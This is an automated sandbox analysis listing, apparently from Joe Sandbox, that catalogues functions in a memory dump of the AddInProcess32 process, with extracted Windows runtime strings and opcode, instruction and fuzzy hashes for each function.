Opcode ID: b009340e2c5f22bc26de3fbf37d6192f236313aadea1bb720354831bb100a632
Instruction ID: 684517c5295cd76ed2f655bba3366537145da62ad43eee0b29c0570dc03e49bf
Opcode Fuzzy Hash: b009340e2c5f22bc26de3fbf37d6192f236313aadea1bb720354831bb100a632
Instruction Fuzzy Hash: 5C714A71A0014A9FDB11DFA9C994FAEB7F8FF58744F144065E909E7251EA34EE01CBA0

Function 0195A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0195AA25
LdrResSearchResource Enter, xrefs: 0195AA13

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 22e4410ef8ca7cfd066c16534535d59d40d411d64d4eab738e41e5a060ef0dde
Instruction ID: 118415a34b41aa85a4740055e82630ea60479d6577c0efe0ae87b0fb266baf15
Opcode Fuzzy Hash: 22e4410ef8ca7cfd066c16534535d59d40d411d64d4eab738e41e5a060ef0dde
Instruction Fuzzy Hash: 9CE16E71E00219ABEB62CF99CA84BEEBBBEFF54310F144626ED09E7251D7349940CB54

Function 01A1A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A1A551
`, xrefs: 01A1A44B

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 63f2ec7c7455425d7326538b12b83d5f20a7a168e7c1266a31ea46735ee9891e
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 8AC1F3312053829BEB25CF28C940B6BBBE5BFC4318F084A2DF69ACB299D775D505CB41

Function 019CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 019CE75A
UEFI, xrefs: 019CE751

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d5b37273a41753c476947dae7a7e2ac5f5ce16981a317fa5bb7c0fa56b36520e
Instruction ID: f5397eb755c560ec8737d51513376452ee8fdf79b5bd8f983ad7a4f00c06e33a
Opcode Fuzzy Hash: d5b37273a41753c476947dae7a7e2ac5f5ce16981a317fa5bb7c0fa56b36520e
Instruction Fuzzy Hash: 66614E71E003199FDB15DFA8C940BAEBBB9FB44B40F14446DE68EEB251D731A900CB52

Function 019F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 019F4437
MUI, xrefs: 019F4525

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 694e119a2dda19d0725e894e4f3c5ac0811176fbabae88e4f02b0b9205b7cb6b
Instruction ID: eb585e9423e000c3c16284938b057157085dcfc965fe678998bc0195844e657f
Opcode Fuzzy Hash: 694e119a2dda19d0725e894e4f3c5ac0811176fbabae88e4f02b0b9205b7cb6b
Instruction Fuzzy Hash: 7E510971D0021DAFDF11DFA9CC84AEFBBBDEB44754F100529EA19BB290D6309A05CB60

Function 019504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01950540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0195063D

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 62d2c2c12e30bb39fb003f5a52e429426bdeb456bc81630cf337c0b4baa624bf
Instruction ID: bb41c2faf21ef16f34d761f43fd13ab65e6e6740541a81847f5991578df3a7eb
Opcode Fuzzy Hash: 62d2c2c12e30bb39fb003f5a52e429426bdeb456bc81630cf337c0b4baa624bf
Instruction Fuzzy Hash: A751DD715007428FD764EF29C4406A7BBE8AF84305F18893EFAAE97241E730D546CBA2

Function 0195A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0195A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0195A309

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 85abf7c92ec58ed7682a7bd9912177e36701a4cd943521f9b697f53c9d5859bc
Instruction ID: d9f77276f99f583d3e4303b5b0ad74c62d931bbe0a4d2edcbb7fe6fbe694bfb3
Opcode Fuzzy Hash: 85abf7c92ec58ed7682a7bd9912177e36701a4cd943521f9b697f53c9d5859bc
Instruction Fuzzy Hash: 3141FF31A04259DFEB15CF59C980BAEBBB8FF85304F1445A5ED08EB292E7B5DA00CB54

Function 0198A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0198A5E9
Cleanup Group, xrefs: 0198A5E4

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 33c3a25452f0c76a4108f211bb762b2e7872d27aa5387ee1dcf4bccf5c042b0c
Instruction ID: 3c1d2d9c91b4a7fce5a08af1b568f9cb2e186335042a2be8f9c83a0739d3fdfb
Opcode Fuzzy Hash: 33c3a25452f0c76a4108f211bb762b2e7872d27aa5387ee1dcf4bccf5c042b0c
Instruction Fuzzy Hash: DC01D1B6251704AFE311EF14CD45F2677E8E7C5729F01893AA64CC7194E334D804CB4A

Function 0195C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0195C8C3, 0195CA40

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 5663bfac011f493d7b5597cfe4e451ce75117ad9fb8b9c402ec8b76598020b01
Instruction ID: bad628e1a8e0e5618bf2ca227e6b673a14b0bd537aff20387156c111ed988281
Opcode Fuzzy Hash: 5663bfac011f493d7b5597cfe4e451ce75117ad9fb8b9c402ec8b76598020b01
Instruction Fuzzy Hash: 95824A75E003199BEB65CFA9C880BEDBBB9BF48710F148169ED1DBB291D7309981CB50

Function 019D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 019D65C1

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f62976eebbbe807d4e60384b4192a78a9abb8adff843d639479ca3503e2463f9
Instruction ID: b653d8f9a8dff510c7c439d3f826b8e957127430faa20e80c15c29585ba1a064
Opcode Fuzzy Hash: f62976eebbbe807d4e60384b4192a78a9abb8adff843d639479ca3503e2463f9
Instruction Fuzzy Hash: 74917371900219AFEB21DF99CD85FAEBBB8EF58B50F504065F608AB190D775AD00CBA0

Function 019FE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 019FE1FA

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1387ccc236d82a5aa8f2dc228a337627a6cec85f9c6b514853145239e5660aa6
Instruction ID: 2bd91c8b62ea350edfdaf0dfea3dd90af2c521e23da5f54c609d856b4c7f28a1
Opcode Fuzzy Hash: 1387ccc236d82a5aa8f2dc228a337627a6cec85f9c6b514853145239e5660aa6
Instruction Fuzzy Hash: 60918E36A01609BBDB22ABA5DC44FEFBBB9EF85744F110029F609A7260E7749901CB51

Function 0198A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 019C67C9

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 51a01394deda4ac91a0178b292b48a05976e2f4548b623431859042707a97770
Instruction ID: e8247fa0ac42deb32891d60a7e9e3bdeedb9e8abd79c7000ae7236aa72f2a15a
Opcode Fuzzy Hash: 51a01394deda4ac91a0178b292b48a05976e2f4548b623431859042707a97770
Instruction Fuzzy Hash: 36718FB5E0030A9FDF28CF9CC590AAEBBB5BF88B11F14852EE549A7341E7359901CB51

Function 0196E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0196E6A4

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: e086584400ea133fee5e6258f0d0e8347d1b51af0da8d10fe2f0f0c9f2e5f7c5
Instruction ID: d1653528dcddc0326b566087fd54116114899274068a73943981b3ff6d61f122
Opcode Fuzzy Hash: e086584400ea133fee5e6258f0d0e8347d1b51af0da8d10fe2f0f0c9f2e5f7c5
Instruction Fuzzy Hash: 15419076518312ABD711DA75C840F6BBBECAFC8714F44092DFA8CD7180E678DA04C7A6

Function 019CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 019CC77F

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 9378095f90f1b64579f76d681103e5a91505897d9af14e43517da70962c1481a
Instruction ID: e3d3778dc5b25abf4e3f68b64fc4640f78e47c8231ede5e7250b9ce312f72255
Opcode Fuzzy Hash: 9378095f90f1b64579f76d681103e5a91505897d9af14e43517da70962c1481a
Instruction Fuzzy Hash: B14145B1D0112DABDF21DB54CC84FDFBB7CAB45714F0045A9AA4CAB140DB709E898FA5

Function 019F2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01dc4ee051e1801bd0cae4abedbf101fa79d20483c3cdabde81bb4e918ff6cb4
Instruction ID: acb36731edda2be1e1be076f56256aaf033eca641a6f330ccd7c18474da9b8d2
Opcode Fuzzy Hash: 01dc4ee051e1801bd0cae4abedbf101fa79d20483c3cdabde81bb4e918ff6cb4
Instruction Fuzzy Hash: F942B175608341ABE725CF68C890B6BBBE9BFC8700F58092DFB8A97250D771D845CB52

Function 019E8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521ded01436ba95bcaa43017aed4b80553800fcdb99c217fc6cc2d88f22042f6
Instruction ID: 0e8c24f96bdce6714549651da625380ce2f3fd0629ff4437a6cf9879e91fa0dd
Opcode Fuzzy Hash: 521ded01436ba95bcaa43017aed4b80553800fcdb99c217fc6cc2d88f22042f6
Instruction Fuzzy Hash: 65426E75E002199FEB25CFA9C845BADBBF5BF88301F148099E94DEB242D7349985CF60

Function 019FA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b314a93f38762da57a614d86333ef8e13afb5e1717f7f0f252b9972f0fcca4
Instruction ID: 8113ec3e31d4559b3ecc69b944ac2d823834e8df6ce853e8ccac49c7ffad0852
Opcode Fuzzy Hash: 61b314a93f38762da57a614d86333ef8e13afb5e1717f7f0f252b9972f0fcca4
Instruction Fuzzy Hash: 8222EF74604661AFEB25CF2DC094B76BBF5AF44341F08885EDB8E8B286D375E452CB60

Function 019565D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9aa732f4aa22057d8177e59a5420ba225560e6b85f52bd1efd1ae02ce2e413
Instruction ID: 0fa37482e93cdd86cc64da776420d1749b6d6530e3389fade60feaa8aca5d5fd
Opcode Fuzzy Hash: 5f9aa732f4aa22057d8177e59a5420ba225560e6b85f52bd1efd1ae02ce2e413
Instruction Fuzzy Hash: DDE1AE71608342CFC755CF28C190A6ABBF4FF89314F448A6DE9999B351EB31E905CB92

Function 01948397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4aeb3204d7f65b88dc3c3f146d5b88cbbcca4ed47e8f8eb283071c8e1e3c2ec
Instruction ID: e4883e8455696a5787930eb4add8d00f9e37d57623253da76d53eae2625da61a
Opcode Fuzzy Hash: d4aeb3204d7f65b88dc3c3f146d5b88cbbcca4ed47e8f8eb283071c8e1e3c2ec
Instruction Fuzzy Hash: 92D1F571A0020A9BDB14DFA8C890FBA77F5BF94714F05862DE91EDB281E730D955CB90

Function 019D8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 0c318baea7c43b32b3b4c0be53b563f62fb59d3174cddc516906deea27e125ba
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 88B19374A00609AFDB24DF99C940FABBBB9FF84354F10C45DEA0A97796DA34E905CB10

Function 01960535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: da9b58afeb9160f0af7f2b5008d24f0005c7a4054c36cf8991fb0f9785c74345
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 54B1F831600646AFDB15DBA8C9D0BBEBBFABF84300F180555E65E97282D730ED41DB60

Function 019583C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113a6244949263a88e1a019b7a739cfa7b25f424f40fe2222d75cd76106460c2
Instruction ID: 978d8062ea37280355c2a3241ca162dd40ed49bed8cad15e207c095ee5f564bc
Opcode Fuzzy Hash: 113a6244949263a88e1a019b7a739cfa7b25f424f40fe2222d75cd76106460c2
Instruction Fuzzy Hash: 52C17874608341CFD764CF19C494BABBBE8BF88308F44496DE98997291D774E909CF92

Function 0194C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bfa55a87f2b5c67a3c986655a5d76d4fbdde776f8e33bc5cf37e180a63cf81
Instruction ID: d6bf5db57a4fddc63e91c37bc4901e0324db1c394f975b4bac345abc26f68154
Opcode Fuzzy Hash: 49bfa55a87f2b5c67a3c986655a5d76d4fbdde776f8e33bc5cf37e180a63cf81
Instruction Fuzzy Hash: 65B17070A042668FDB25DF68C890BADB3B5EF84700F0485EAD50EE7291EB309D85CB61

Function 0197E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95f53d78db2f77aee8d6c4823d62c3597bbed276e46be1d2315032bf0012eb9f
Instruction ID: 840b9208b61fcb860d971f087782bbf77381be31f5be5311e35b0504aa956f0e
Opcode Fuzzy Hash: 95f53d78db2f77aee8d6c4823d62c3597bbed276e46be1d2315032bf0012eb9f
Instruction Fuzzy Hash: 6BA12431E00659AFEB22DB9CCD84FEEBBB8AF41714F050165EA08AB291D7749D41CBD1

Function 01990185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018b9069c99650e29cb176a2f254a53e53607c0bd9d1540bb280f9b04c37fadd
Instruction ID: 5bc9d4fda6c5688639c1bd9f5bb08b0257f7989d5da3ff4b91e79050bcbec050
Opcode Fuzzy Hash: 018b9069c99650e29cb176a2f254a53e53607c0bd9d1540bb280f9b04c37fadd
Instruction Fuzzy Hash: 0EA1F270B00616DBDF25CF6DC590BAAB7B9FF54719F084029EA5D97281EB34E811CB90

Function 01A24500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4028a0e2c9ae58c1640316e22265c7e5d2478160c79b118876de1fa2778fceb
Instruction ID: e7cf5f214e2364b5eeb79299da047c0aedaeff6265071494f57767475bbf0563
Opcode Fuzzy Hash: c4028a0e2c9ae58c1640316e22265c7e5d2478160c79b118876de1fa2778fceb
Instruction Fuzzy Hash: 8FA1ED72A14622EFD726DF2CC980B2ABBE9FF88704F050528F5899B651D374ED01CB91

Function 019D60E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cee21f05cb88b55bfd9a5ff341326ad08f971ea348c9f604fb774ad5ac5777c
Instruction ID: 9e56dd1ab5233e67791b7af0489f7aded1769ea2e43f63f48741ec94ba7267d1
Opcode Fuzzy Hash: 7cee21f05cb88b55bfd9a5ff341326ad08f971ea348c9f604fb774ad5ac5777c
Instruction Fuzzy Hash: 22919671D0021AAFDF15CFA8D884BBEBFB9AF49710F158169E618EB341D734D9009BA0

Function 0196E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a94d6046d3673a5dd5743cde500dbc3abb86205371ee36bcf182d827d0e746a
Instruction ID: 3c0ddc963f37161c4f1df38d38adbbe2e3be3d81e15501d8fb0ac1009b0da79b
Opcode Fuzzy Hash: 1a94d6046d3673a5dd5743cde500dbc3abb86205371ee36bcf182d827d0e746a
Instruction Fuzzy Hash: 5E914579A00616CBEB24DB6CC580BBDBBA9EF94B15F148469EE0D9B380E634D901C761

Function 0198E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738d81c8a977c1c342fa937e629bc20b33acb1ef8e17653c65bcdd60b72fee71
Instruction ID: ffff4f2a8260d03f696d0c847fa523850823f0dec64bbed07665e98a4e08f184
Opcode Fuzzy Hash: 738d81c8a977c1c342fa937e629bc20b33acb1ef8e17653c65bcdd60b72fee71
Instruction Fuzzy Hash: A2817E71A00609AFDB25DFA9C890BEEBBF9FF88754F10442EE559A7250D730AC05CB60

Function 0196C640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2646fe3b085fa5376a463e425c006a1bbc601e9e22e6d48e3b46a908cbda5f
Instruction ID: daa55449468bf2df9fdcc1309447d6130aeaae40f3ec8203158804380ad0b264
Opcode Fuzzy Hash: 6f2646fe3b085fa5376a463e425c006a1bbc601e9e22e6d48e3b46a908cbda5f
Instruction Fuzzy Hash: DF71D179C01626DBCB258F58C590BFDBBB8FF8C710F14451AE989AB350D774A801CBA0

Function 01A047A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efa5d1fce4a13993cf20ece151d67aa144f5275659ff6f5bbce155e2717ae62a
Instruction ID: 56582003018581dd72cf13610a562050bbfb1c2dc255170ffee0bf9a7d93634c
Opcode Fuzzy Hash: efa5d1fce4a13993cf20ece151d67aa144f5275659ff6f5bbce155e2717ae62a
Instruction Fuzzy Hash: 377192B8D00305EFDB21CF59E944A9ABBF8FFC9710F14416AE71897298C7728985CB54

Function 0196260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d53cd4062194688e157085d1a3a1f6989eadd050123baed0d8ff81071cde0b3
Instruction ID: 455fd7d4e448264016cb09e9f7efb3da7f6abc60ef40ce08483830b9121d085b
Opcode Fuzzy Hash: 3d53cd4062194688e157085d1a3a1f6989eadd050123baed0d8ff81071cde0b3
Instruction Fuzzy Hash: 3971B2756046428FD312DF28C484B6AB7E9FF84311F0485AAE89DCB351DB38ED46CBA1

Function 019D035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: d65e9362b276a85a9f4aac15da906c74cf4cd24017fc63fbc595f77fc9a4b5f7
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: B6714F71E00619AFDB10DFA9C944EDEBBB9FF98700F148569E909A7250DB34EA41CB50

Function 019E62A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba44c95e68fc064cbe14ceaa360203a850feab5bbd8c273abc805c40510a560e
Instruction ID: 9ceba52d9830e81aad2f6f89f9ea3d0068b239406ab3ae43ddbe627818d1ebbd
Opcode Fuzzy Hash: ba44c95e68fc064cbe14ceaa360203a850feab5bbd8c273abc805c40510a560e
Instruction Fuzzy Hash: 1871D532140701AFEB33DF18C848F5ABBEAEF94761F154818E65E872A1E775E944CB50

Function 01A28324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76c2e669d0ea2a59635588402164786229b477a6b83eb737beb96b7d8e1f2e0
Instruction ID: 1b982bcfa343cb774ace69dd7fae0642d35526a6895555a8fca2b83a0f5a5e13
Opcode Fuzzy Hash: c76c2e669d0ea2a59635588402164786229b477a6b83eb737beb96b7d8e1f2e0
Instruction Fuzzy Hash: E871F771E01219BFDF16DB98C841FEEBBB8FF44350F104169F614A6290E778AA45CBA0

Function 01A0A250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da092e2419272bb8dff412cfbc9721b221432b6cf2706e5a220d9b4a14306049
Instruction ID: 7562ed8ad8d53f4f2645c9f7f8f4ae2703f6e9ed613677f9c6d2928fd6ec3aaf
Opcode Fuzzy Hash: da092e2419272bb8dff412cfbc9721b221432b6cf2706e5a220d9b4a14306049
